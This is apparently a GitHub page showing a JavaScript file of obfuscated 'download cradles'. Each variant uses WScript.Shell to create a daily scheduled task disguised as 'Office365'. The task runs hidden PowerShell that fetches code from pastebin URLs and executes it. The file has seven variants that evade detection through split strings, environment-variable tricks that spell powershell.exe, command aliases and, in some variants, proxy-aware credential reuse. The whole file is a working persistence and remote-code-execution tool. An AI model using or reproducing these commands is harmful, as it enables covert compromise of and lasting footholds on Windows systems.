-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathTaskschedule_Download_Cradles.js
45 lines (32 loc) · 4.11 KB
/
Taskschedule_Download_Cradles.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#Info: This .js scripts can be used, to create a taskschedule persistence with a not proxy aware PowerShell Download Cradle
#Info: To escape \" in .js \\\\\\"
c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
c.run('cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR "pOwErsHelL -w hidDEn -nOpR -coM \'I`eX (N`E`W`-obje`CT Net.Webclient).\\\\\\"dowNloa`DST`RIng\\\\\\"((\\\\\\"https://pastebin.com/raw/88SGrHVh\\\\\\"))"', 0);
#Info: This .js scripts can be used, to create a taskschedule persistence with a not proxy aware PowerShell Download Cradle
#Info: %APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l = powershell.exe
c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
c.run('cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR "%APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l -w hidDEn -nOpR -coM \'I`eX (N`E`W`-obje`CT Net.Webclient).\\\\\\"dowNloa`DST`RIng\\\\\\"((\\\\\\"https://pastebin.com/raw/88SGrHVh\\\\\\"))"', 0);
#Info: This .js scripts can be used, to create a taskschedule persistence with a not proxy aware PowerShell Download Cradle
#Info: %APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l = powershell.exe
#Info: &(GAL IE*) = Alias IEX
c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
c.run('cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR "%APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l -w hidDEn -nOpR -coM &(GAL IE*) ((N`E`W`-obje`CT Net.Webclient).\\\\\\"dowNloa`DST`RIng\\\\\\"((\\\\\\"https://pastebin.com/raw/88SGrHVh\\\\\\")))"', 0);
#Info: This .js scripts can be used, to create a taskschedule persistence with a not proxy aware PowerShell Download Cradle
#Info: %APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l = powershell.exe
#Info: &(GAL IE*) = Alias IEX
#Info: .(Get-Command N*ct) = New-Object
c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
c.run('cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR "%APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l -w hidDEn -nOpR -coM &(GAL IE*) ((.(Get-Command N*ct) Net.Webclient).\\\\\\"dowNloa`DST`RIng\\\\\\"((\\\\\\"https://pastebin.com/raw/88SGrHVh\\\\\\")))"', 0);
#Info: This .js script can be used, to create a taskschedule persistence with a proxy aware PowerShell Download Cradle
#Info: To escape \" in .js \\\\\\"
c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
c.run('cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR "PoWeRsHelL.eXe -NoP -w HidDen -c $a=neW-ObJeCt nET.wEbClieNt;$a.pROxy=[NeT.WeBreQueSt]::geTsyStEmweBprOxy();$a.prOxY.crEdEnTials=[NEt.crEdEnTiaLcaChe]::deFaUltcrEdeNtials;IeX $a.DOwNLOadstRiNg(\\\\\\"ht\\\\\\"+\\\\\\"tps://pastebin.com/raw/88SGrHVh\\\\\\")"', 0);
#Info: This .js script can be used, to create a taskschedule persistence with a proxy aware PowerShell Download Cradle
#Info: &(GAL IE*) = Alias IEX
c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
c.run('cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR "PoWeRsHelL.eXe -NoP -w HidDen -c $a=neW-ObJeCt nET.wEbClieNt;$a.pROxy=[NeT.WeBreQueSt]::geTsyStEmweBprOxy();$a.prOxY.crEdEnTials=[NEt.crEdEnTiaLcaChe]::deFaUltcrEdeNtials;&(GAL IE*) $a.DOwNLOadstRiNg(\\\\\\"ht\\\\\\"+\\\\\\"tps://pastebin.com/raw/Qpiz8y6c\\\\\\")"', 0);
#Info: This .js script can be used, to create a taskschedule persistence with a proxy aware PowerShell Download Cradle
#Info: %APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l = powershell.exe
#Info: &(GAL IE*) = Alias IEX
c=new ActiveXObject("W"+"S"+"cr"+"ip"+"t."+"S"+"h"+"e"+"l"+"l");
c.run('cmd.exe /c SchTasks /Create /SC DAILY /ST 12:00 /TN Office365 /TR "%APPDATA:~-13,1%%ALLUSERSPROFILE:~-9,-8%%OS:~-5,1%er%TMP:~7,1%he%TEMP:~-10,1%l -NoP -w HidDen -c $a=neW-ObJeCt nET.wEbClieNt;$a.pROxy=[NeT.WeBreQueSt]::geTsyStEmweBprOxy();$a.prOxY.crEdEnTials=[NEt.crEdEnTiaLcaChe]::deFaUltcrEdeNtials;&(GAL IE*) $a.DOwNLOadstRiNg(\\\\\\"ht\\\\\\"+\\\\\\"tps://pastebin.com/raw/Qpiz8y6c\\\\\\")"', 0);